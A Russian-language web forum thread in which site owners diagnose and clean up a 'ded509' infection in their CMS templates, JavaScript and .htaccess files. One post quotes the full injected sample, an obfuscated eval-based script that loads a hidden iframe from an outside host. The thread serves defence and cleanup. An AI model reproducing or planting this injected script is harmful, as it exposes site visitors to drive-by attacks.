ded509 script

ЕСТЬ РЕШЕНИЕ ЗАКРЫТО
#1 13 апреля 2013 в 12:44
Доброго времени суток. Никто не сталкивался с кодом во всех tpl с комментарием ded509? Нашел информацию, что это код спам рассылки. Почистил все tpl и закралось у меня скудное сомнение, что не все так просто, что где-то еще он есть.
Если кто-то сталкивался подскажите где еще искать и как бороться дабы не было больше такого случая.
#2 13 апреля 2013 в 14:05
Так же нашел код в htaccess
#3 15 апреля 2013 в 08:50
Еще эта пакость обитает в .js и .jpg Пройдись поиском по всем файлам, ища конкретно эту запись в содержимом и увидевший где наследил. Надеюсь пароли ты уже сменил?
#4 15 апреля 2013 в 10:38
Aloha, картинки не нашел, 2 js точно сменил 3 или 4 htaccess все tpl. Писали на форумах, что и php прячется, но там не нашел. Буду копать дальше. Пароли сменил после того как вычистил БУК. Если найду еще отпишусь.
#5 15 апреля 2013 в 11:13
Aloha, это просто п***ц все js заляпал. Почти весь сайт чистить надо.
#6 15 апреля 2013 в 13:54

Никто не сталкивался с кодом во всех tpl с комментарием ded509

Boffka
Это уже последствия заражения.Понятно что никаких коментов <!--ded509--> в шаблонах и быть не должно.
Вам внедрили в js исполняемый eval код, обработанный обфускатором.Последстия самые не предсказуемые.
Лечить? Снести и поставить заново, и базу просканировать на наличие скриптов в теле статей, и прочего контента.
Внедренный код h t t p:/ / anthu.com/thu4/
  1. <!--ded509--><script type="text/javascript" language="javascript" e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!7d!66!75!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!7d!66!75!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!6b!7a!67!70!6e!72!66!67!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42!25!2c!66!67!78!74!71!7a!79!6a!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!67!74!77!69!6a!77!25!42!25!2c!35!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!6d!6a!6e!6c!6d!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!7c!6e!69!79!6d!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!71!6a!6b!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!7d!66!75!33!78!79!7e!71!6a!33!79!74!75!25!42!25!2c!36!75!7d!2c!40!12!f!12!f!25!25!25!25!6e!6b!25!2d!26!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!7d!66!75!2c!2e!2e!25!80!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!7c!77!6e!79!6a!2d!2c!41!69!6e!7b!25!6e!69!42!61!2c!7d!66!75!61!2c!43!41!34!69!6e!7b!43!2c!2e!40!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!7d!66!75!2c!2e!33!66!75!75!6a!73!69!48!6d!6e!71!69!2d!7d!66!75!2e!40!12!f!25!25!25!25!82!12!f!82!2e!2d!2e!40".split(a2);s="";for(i=0;i<z.length;i++){s+=String.fromCharCode(e(v+(z[i]))-5);}zaz=s;e(zaz);}</script><!--/ded509-->
PS//Мое бредовое рассуждение.
Теоретически могут быть проблемы с подменой кода цвета, не исключено что внедрение может произойти через подмену кода палитры DED509, приводящую к определенной ошибке и возможности внедрить чужеродный код.
Но тогда почему именно этот код цвета а не любой другой?
#7 15 апреля 2013 в 15:07
oll, почему именно сам ХЗ. Проверил на сервисах теперь все чисто если им верить. Жду ответа от платона. Некоторые сервисы показали, что есть скрытые iframe сейчас займусь их поиском. Вот они скорее всего и будут в статьях
#8 15 апреля 2013 в 15:23
Проверил базу вроде чисто. На iframe одно совпадение в блогах пользователь вставлял видео. По ded ничего не найдено. Возможно я немного с кривыми руками. oll, если не сложно как сканить базу?
#9 15 апреля 2013 в 15:31

iframe

Boffka
В самом инстанте нет ни одного фрейма.Поэтому все что касаеться проколов, то это личные наработки вашего шаблона и сторонних разработок для вашего сайта.
Вот поэтому проблема малозначительна.Кто знает о нерешенной проблеме использования iframe, тот и спокоен.
Анализируй код на наличие iframe
Модуль враппер, что аналогичное установлено.Делаеться двумя движениями .
На локал хосте ставиш копию сайта. на второй домен копию дистрибутива инстанта. Запуск программы смерживания файлов.WinMerge или аналогичные, я пользуюсь лицензионной Araxis Merge. По отличию файлов все видно.
#10 15 апреля 2013 в 15:34
oll, спасибо за подсказку. Позже отпишусь по результату
#11 15 апреля 2013 в 15:41
Потом пожалуйста перед закрыванием темы, сделай красивый жест.
Отпишись о наработках по устранению таких проблем.
З… Последнее время только и видиш ЭГОПОСТУПКИ.
Тема закрыта всем спасибо.
#12 15 апреля 2013 в 16:28
oll, ок не вопрос
#13 15 апреля 2013 в 17:22
И так, что было сделано:
— Заменены все файлы htaccess
— Полная проверка всех файлов tpl и чистка их от вредоноснного кода так как все были заражены
— Полная замена папки admin все .js были заражены
— Замена всех файлов в папке includes так же все .js заражены
— Замена mod_rewrite
— Удалил все загруженные картинки на дату заражения
— iframe так и небыли мной обнаружены
— Обязательно проверьте папки шаблонов так как я там встретил htaccess которые там не должны были быть.

Ребята если сказать честно, лечиться полной заменой движка. Такой объем заразы я встретил в первые.

Тему до вечера не закрываю. Возможно еще дополню.
#14 15 апреля 2013 в 18:01
Не удивительно что ты первороходец.Я кинула по вскидке на поиск DED509 результат выдачи в основном это код палитры цвета.И единственный ресурс начала заражения приведен выше.
В вашем случае ( это надо всем кто сдесь живет)видимо надо постоянно описывать происходящие события, а решения будут принимать по мере их поступления
#15 15 апреля 2013 в 18:11
oll, сейчас снова проверял файлы и снова вылазят зараженные и именно те которые я чистил еще утром. Не могу понять в чем причина повторного заражения. Думаю написать хостеру и узнать, что-нибудь у них.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.